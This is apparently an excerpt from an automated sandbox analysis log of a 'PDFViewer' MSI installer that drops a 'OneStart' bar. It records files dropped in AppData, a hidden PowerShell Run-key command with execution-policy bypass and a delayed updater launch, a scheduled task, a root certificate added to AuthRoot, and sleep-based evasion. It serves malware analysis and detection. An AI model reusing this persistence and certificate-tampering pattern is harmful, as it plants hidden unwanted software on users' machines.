          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4544:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2620:120:WilError_02
          Source: C:\Windows\System32\msiexec.exeFile written: C:\Users\user\AppData\Roaming\OneStart\bar\updater.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PDFViewer_44882564 (1).msi Static file information: File size 101422592 > 1048576
          Source: PDFViewer_44882564 (1).msi Static PE information: certificate valid
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Json.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.MemoryMappedFiles.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.NonGeneric.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\ScreenRecorderLib.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Specialized.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Container.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Newtonsoft.Json.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_2.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TextWriterTraceListener.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.Shell.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Watcher.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Parallel.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.Unsafe.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.X509Certificates.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Principal.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NameResolution.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.TypeConverter.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Console.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlDocument.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Process.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Formatters.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Json.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.Client.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Encoding.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Pipes.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Debug.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Unity.Abstractions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Requests.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\updater.exe
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XmlSerializer.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Reader.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Queryable.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Thread.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Buffers.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.CompilerServices.VisualC.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tools.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Win32.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Handles.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Security.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Contracts.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.XDocument.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\DBarCore.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.RuntimeInformation.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Sockets.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Xml.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Algorithms.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Tasks.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Numerics.Vectors.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.NetworkInformation.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_1.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Dynamic.Runtime.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.FileVersionInfo.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebHeaderCollection.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XPath.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.StackTrace.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.Calendars.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Data.Common.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Claims.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Globalization.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.SecureString.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI112.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.RegularExpressions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Extensions.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_codecvt_ids.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\vcruntime140.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Csp.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.ReaderWriter.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Overlapped.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\vccorlib140.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Writer.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.ResourceManager.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_atomic_wait.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encodings.Web.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ObjectModel.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.ThreadPool.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\websocket-sharp.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Numerics.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XDocument.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ValueTuple.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Timer.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\concrt140.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI9297.tmp
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dll
          Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Primitives.dll

          Boot Survival

          Source: C:\Windows\System32\msiexec.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBarUpdate
          Source: C:\Windows\System32\msiexec.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBar
          Source: C:\Windows\System32\msiexec.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneStartBarUpdate powershell.exe -WindowStyle Hidden -ExecutionPolicy bypass -c "Start-Sleep 2400";"& 'C:\Users\user\AppData\Roaming\OneStart\bar\updater.exe' /silentall -nofreqcheck"
          Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\Tasks\{016B0CAE-5791-4C21-9ECC-8DF8314A3625}.job

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\msiexec.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A Blob
          Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4752 Thread sleep count: 3168 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep count: 2692 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048 Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep count: 2062 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6544 Thread sleep count: 2470 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616 Thread sleep count: 2824 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616 Thread sleep count: 2044 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3528 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 244 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448 Thread sleep count: 3914 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448 Thread sleep count: 2989 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3540 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4016 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6048 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936 Thread sleep count: 2606 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936 Thread sleep count: 6055 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116 Thread sleep time: -2767011611056431s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6648 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5184 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416 Thread sleep count: 2768 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416 Thread sleep count: 1852 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4728 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1448 Thread sleep count: 1541 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1500 Thread sleep count: 910 > 30
